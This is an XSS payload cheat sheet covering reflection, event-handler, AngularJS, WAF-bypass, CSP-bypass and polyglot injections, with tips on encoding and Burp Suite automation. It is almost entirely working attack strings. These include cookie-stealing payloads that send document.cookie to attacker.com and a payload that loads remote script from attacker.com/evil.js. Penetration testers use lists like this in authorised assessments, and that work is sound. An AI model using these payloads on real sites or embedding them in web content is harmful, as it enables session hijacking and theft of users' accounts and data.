🛡️ XSS Payloads Cheatsheet

⚠️ Ethical Notice: These payloads should only be used on systems you have permission to test!

1. Basic Reflection Payloads

<script>alert(1)</script>
<script>alert("hacked by rakshak")</script>
<u>hello</u>  // Test for HTML parsing

2. Image Tag Payloads

<img src=1 onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<img src=1 onerror=print()>
<img src=1 onerror=alert(1) style=display:none>

3. JavaScript Context Payloads

'; alert(1); var x='
</script><script>alert(1)</script>//
'\</script><script>alert(1)</script>//

4. AngularJS Payloads

{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{{}[{toString:[].join,length:1,0:'__proto__'}].toString.$apply()}}

5. WAF Bypass Payloads

<body onresize=print()>
<custom onmouseover=alert(1)>
<svg><animatetransform onbegin=alert(1) attributeName=transform>
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])]

6. Event Handler Payloads

" onclick=alert(1) a="
" onerror=alert(1) x="
" onmouseover=alert(1) "
" onfocus=alert(1) autofocus "
" onresize=print() "

7. iframe-Based Payloads

<iframe src="javascript:alert(1)">
<iframe src="https://victim.com/#" onload="this.src+='<img src=x onerror=alert(1)>'">
<iframe srcdoc="<script>alert(1)</script>">

8. Cookie Stealing Payloads

<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
<script>navigator.sendBeacon('https://attacker.com/log', document.cookie)</script>
<img src=x onerror="fetch('https://attacker.com/?'+document.cookie)">

9. DOM-Based Payloads

javascript:alert(1)
data:text/html,<script>alert(1)</script>
<svg><set onload=alert(1)>
<details open ontoggle=alert(1)>

10. Modern Framework Payloads

javascript:eval('var a=document.createElement(\'script\');a.src=\'https://attacker.com/evil.js\';document.body.appendChild(a)')
<link rel="import" href="javascript:alert(1)">
<embed src="javascript:alert(1)">

11. Polyglot Payloads

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
'">><marquee><img src=x onerror=confirm(1)></marquee>

12. CSP Bypass Payloads

<script nonce=PREDICTED_NONCE>alert(1)</script>
<base href="javascript:/"><a href="/*alert(1)">click
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

🔥 Tips for Using These Payloads:

  1. Always URL-encode payloads when needed
  2. Test for different contexts (HTML, JS, attribute)
  3. Try combinations of payloads
  4. Use Burp Suite to automate testing
  5. Keep track of which payloads work in which scenarios
  6. Consider browser-specific payloads
  7. Test with different encoding techniques